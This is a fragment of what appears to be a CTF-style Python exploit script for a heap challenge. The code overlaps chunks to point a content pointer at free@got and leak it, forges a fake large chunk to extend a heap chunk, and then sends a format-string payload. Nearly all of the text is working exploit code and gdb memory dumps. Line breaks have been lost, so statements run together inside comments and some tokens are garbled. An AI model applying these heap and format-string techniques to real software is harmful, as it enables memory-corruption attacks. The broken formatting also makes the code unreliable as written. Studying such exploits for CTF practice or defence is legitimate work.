# NOTE(review): line breaks in this snippet were lost in extraction — the
# text after the first `#` on the `Create(...)` line, including the
# `size,content=Show(1)` statement, is all inside one comment as shown here,
# so the Show() call never runs in this form; restore the original line
# structure before reading it as runnable code. `Create`, `Show`, `p64`
# and `free_got` are defined elsewhere in the script (not visible here).
# trigger heap 2's size to fastbin 0x40 # heap 2's content to fastbin 0x20
Create(0x30,p64(0)*4+p64(0x30)+p64(free_got)) # new heap 2's struct will point to old heap 2's content, size 0x20 # new heap 2's content will point to old heap 2's strcut, size 0x30 # that is to say we can overwrite new heap 2's struct # here we overwrite its heap content pointer to free@got(when we print, printf will print the loacation which free@got point to) size,content=Show(1) # 0x785040: 0x6161616161616161 0x0000000000000041 <== new chunk2's content # 0x785050: 0x0000000000000000 0x0000000000000000 # 0x785060: 0x0000000000000000 0x0000000000000000 <== new chunk2's size which was overwrite right now # 0x785070: 0x0000000000000030 0x0000000000602018 <== point to new shcunk2's size and content
deffmt(fmtstr, argv): log.info('step 1. chunk extend.') payload = fmtstr # fmtstr payload = payload.ljust(0x80, 'f') payload += p64(0) # order 2's prev_size payload += p64(0x151) # order 2's size --> fake large payload += '\x00' * 0x140# padding for fake chunk payload += p64(0x150) # fake chunk's next chunk's prev_size payload += p64( 0x21 ) # fake chunk's next chunk's size, bypass the check: !prev_inuse(nextchunk) payload += '\x00' * 0x10# padding for fake chunk's next chunk payload += p64(0x20) + p64( 0x21) # bypass the check: in order not to consolidate edit(1, payload) # modify order 2's chunk size to 0x140 gdb.attach(p) delete(2) # now, unsorted bin\'s head chunk size 0x140.
log.info('step 2. format vulnerability') # when submit, the overall order content is : # Order 1: order1 # Order 2: Order1: order1 # try to construct format parameter too payload = 'FFFFFFF' + argv submit(payload) p.recvuntil('2: Order 1: ')